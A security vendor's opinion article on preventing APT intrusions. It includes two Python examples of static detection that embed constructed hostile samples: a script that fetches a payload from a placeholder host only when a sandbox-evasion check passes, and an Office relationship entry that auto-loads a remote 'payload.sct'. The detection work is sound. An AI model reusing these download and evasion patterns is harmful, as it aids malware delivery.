When it comes to persistent malware... prevent, don't remediate

(Image credit: Andriano.cz / Shutterstock)

There’s been a lot of buzz about ransomware lately, and rightly so. Its prevalence grew by 59% in 2017 and fourth quarter figures demonstrate that it’s not slowing down. It’s scary — losing data means losing money, business, intellectual property, and customers. Even more alarming, ransomware attackers are targeting public life — municipal systems, schools, hospitals, and other vulnerable high stakes targets. Most of us find it easier to understand ransomware and what motivates attackers — it makes for a better story than nefarious shell scripts and remote protocol exploits. 

However, ransomware and other forms of malware go far beyond simple exploits for financial gain. They reinforce, and sometimes provide distracting cover for, Advanced Persistent Threats (APTs). These prolonged, multi-stage attacks are carried out by criminals and state-sponsored hackers for the purposes of espionage, credential and data theft, IP theft, fraud, widespread disruption — or some combination thereof. APT-style attacks are rising at an exponential rate. A vast industry of cybersecurity products, which go far beyond early-generation anti-virus and firewall solutions, has sprung up to combat and address these new threats at the various stages of the exploitation life cycle.

Though APTs may vary significantly from each other, there’s one clear common denominator that is at the heart of every successful attack — the ability to infiltrate a network, dwell undetected, and execute malicious actions. Traditional defenses, even the most advanced ones such as sandboxing, have all been based on the assumption that advanced techniques will be able to detect ‘malicious intent’ and separate it from ‘good intent’.

This game of cat and mouse is the essential dynamic shaping the security industry at the moment. But the attackers too often prevail, because they successfully evolve their techniques to work around heuristics-based detection. By nature, traditional defense technologies have a high rate of misdetection and false alarms, obscuring vulnerabilities and creating further problems for maxed-out security teams.

To invert this frustrating and costly dynamic, we need to identify a “weakest link” common to most cyber-attacks that could give defenders the upper hand.

Common ground

In order to establish a beachhead, attackers need a way to install a ‘piece’ of executable code on a machine in the target network. They will use any number of methods to get a legitimate user to access and activate malicious content (spear phishing). To avoid detection, the executable code (aka ‘shellcode’) is hidden in data objects (office documents) and executed by exploiting vulnerabilities in common applications. 

The impact of these infiltrations has been staggering and continues to spread. According to Cybersecurity Ventures, global cybercrime damage costs will hit $6 trillion annually by 2021. Spending on cybersecurity products and services will add up to more than $1 trillion over the next 3 years. Meanwhile, millions of cybersecurity jobs remain unfilled due to skills shortages and insufficient educational pipelines. 

It's about prevention, not remediation

APTs continue to use a familiar route to achieve exploitation. According to Mandiant’s M-Trends, details of the exploitation life cycle can be summed up as follows: 

  • Step 1: Reconnaissance
  • Step 2: Initial Intrusion into Network
  • Step 3: Establish Network Backdoor
  • Step 4: Obtain User Credentials
  • Step 5: Install Various Utilities 
  • Step 6: Privilege Escalation / Lateral Movement / Data Exfiltration
  • Step 7: Maintain Persistence  

Step 2 – the initial intrusion – remains the critical step for APT operators. Gaining a foothold in the target environment is the primary goal of the initial intrusion. Once a network is exploited, the attacker usually places malware on the compromised system and uses it as a starting point or proxy for further actions. Malware placed during the initial intrusion phase is commonly a simple downloader, a basic Remote Access Trojan, or a simple shell. The problem is that few cybersecurity tools can detect shellcode using dynamic packers for which no known signatures or patterns are available.

It’s clear that preventing an intrusion early – before the need for costly remediation – is the best (and cheapest) practice for fighting APTs. In 60 percent of cases, attackers are able to compromise an organization within minutes, but it takes most businesses about 197 days to detect a breach on their network, causing remediation costs to skyrocket.

Detecting the evasive

Despite considerable advances and investments in security, attackers still possess the edge, particularly in zero-day attacks. Traditional cybersecurity software is often counterproductive because once it identifies a malicious piece of content, it proceeds to analyze it in situ – thereby exposing the environment it is supposed to protect to contamination and compromise. To keep prevention itself ahead of the attackers, you need an elegant security protection architecture that is evasion-proof.

An evasion-proof architecture systematically scans for hidden code instructions – or any other commands that might indicate malicious intent – and will not open or execute incoming files. By inspecting the code rather than triggering the exploit within it, no doomsday device is set off, and the platform can catch any suspicious code, place it in quarantine and review it at a later time. Ultimately, malicious code never gets to the point of evading detection because it never gets a chance to execute itself and spread throughout the network.

Similarly, the evasion-proof approach requires analyzing and interpreting scripts, evaluating every single statement line by line. Every possible flow of execution, including conditional branches, has to be exposed and normalized.
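As an added illustration of this branch-insensitive analysis (example code written for this article, not Solebit's product), the snippet below walks a constructed Python script with the standard `ast` module, visits both arms of every conditional without evaluating the condition, and folds concatenated string constants so that a URL built from fragments is still reported whole. The sample script, its URL and the "suspicious call" list are all constructed for the example.

```python
# Added example, not the vendor's code: statically expose every statement of a
# script, including both arms of each conditional, without executing it.
import ast

# Constructed sample: the download only runs when the environment check passes,
# so a sandbox in which the condition is false never observes it.
SAMPLE = '''
import os, urllib.request
if os.cpu_count() > 2:
    u = "http://" + "dl.example" + ".invalid/p.bin"
    urllib.request.urlopen(u)
else:
    print("nothing to do")
'''

def normalize(node):
    """Fold a chain of string constants joined with '+' into one literal."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = normalize(node.left), normalize(node.right)
        if left is not None and right is not None:
            return left + right
    return None

def qualname(func):
    """Render a call target such as urllib.request.urlopen as dotted text."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = qualname(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return None

def expose_flows(source):
    """Return (calls, strings, branch_count) reachable on ANY path; no branch is pruned."""
    calls, strings, branches = set(), set(), 0
    for node in ast.walk(ast.parse(source)):   # ast.walk visits both arms of every If
        if isinstance(node, ast.If):
            branches += 1
        elif isinstance(node, ast.Call):
            name = qualname(node.func)
            if name:
                calls.add(name)
            for arg in node.args:
                literal = normalize(arg)
                if literal is not None:
                    strings.add(literal)
        elif isinstance(node, ast.Assign):
            literal = normalize(node.value)
            if literal is not None:
                strings.add(literal)
    return calls, strings, branches
```

Running `expose_flows(SAMPLE)` reports the `urlopen` call and the reassembled URL even though a dynamic run on a small VM would only reach the `else` arm.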

When it comes to malicious URLs, this method accurately detects and differentiates between hyperlinks and automatically invoked remote objects, yielding information on the purpose of every remote object and its behavior. Evasion-proof analysis determines the type of embedding used — without needing to fetch the actual remote file or object — in order to figure out its level of maliciousness in real time, and block even the most evasive malware.
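The distinction between a hyperlink and an automatically invoked remote object can be read from an Office document's relationship metadata alone. The added example below (written for this article, not Solebit's code) parses a constructed `word/_rels/document.xml.rels` fragment and classifies each relationship by its type and `TargetMode`, without fetching any target; the set of relationship types treated as auto-resolving (`oleObject`, `attachedTemplate`) is a working assumption for the example, not an exhaustive list.

```python
# Added example, not the vendor's code: classify OOXML relationships by how the
# remote target is reached, using only the package metadata (nothing is fetched).
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Assumption for this example: these relationship types are resolved by the
# application when the document opens, with no user click involved.
AUTO_INVOKED = {"oleObject", "attachedTemplate"}

# Constructed sample rels file: one clickable link, one externally linked OLE
# object, one embedded image. The hosts are placeholders.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="%shyperlink" Target="https://example.invalid/report" TargetMode="External"/>
<Relationship Id="rId2" Type="%soleObject" Target="https://example.invalid/payload.sct" TargetMode="External"/>
<Relationship Id="rId3" Type="%simage" Target="media/image1.png"/>
</Relationships>""" % (REL_NS, REL_NS, REL_NS)

def classify_rels(xml_text):
    """Return {Id: (category, target)} where category is one of
    'internal', 'hyperlink', 'auto-invoked' or 'external-other'."""
    root = ET.fromstring(xml_text)
    result = {}
    for rel in root:                      # children are <Relationship> elements
        rid = rel.get("Id")
        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
        target = rel.get("Target", "")
        if rel.get("TargetMode") != "External":
            category = "internal"         # part lives inside the package
        elif rtype == "hyperlink":
            category = "hyperlink"        # fetched only if the user clicks
        elif rtype in AUTO_INVOKED:
            category = "auto-invoked"     # fetched by the application on open
        else:
            category = "external-other"
        result[rid] = (category, target)
    return result

def auto_invoked_targets(xml_text):
    """Just the targets a reviewer should look at first."""
    return sorted(t for c, t in classify_rels(xml_text).values() if c == "auto-invoked")
```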

The task of evaluating heuristics scores, behavioral anomalies, false positives, and false negatives quickly becomes an unmanageable burden to security teams already stretched thin. And by the time the analysis is done, the malware could have found its way into your network. By not relying on underlying technology stack variations or requiring a carefully curated environment for runtime analysis, an evasion-proof architecture can be more effective in stopping today’s attackers — and protecting against new forms of attack that will certainly be deployed in the future. 

Boris Vaynberg, CEO and Co-Founder of Solebit 


Boris Vaynberg is CEO and cofounder of Solebit. He brings more than a decade of experience in leading large-scale cyber- and network security projects in the civilian and military intelligence sectors. He has more than 12 years of working experience.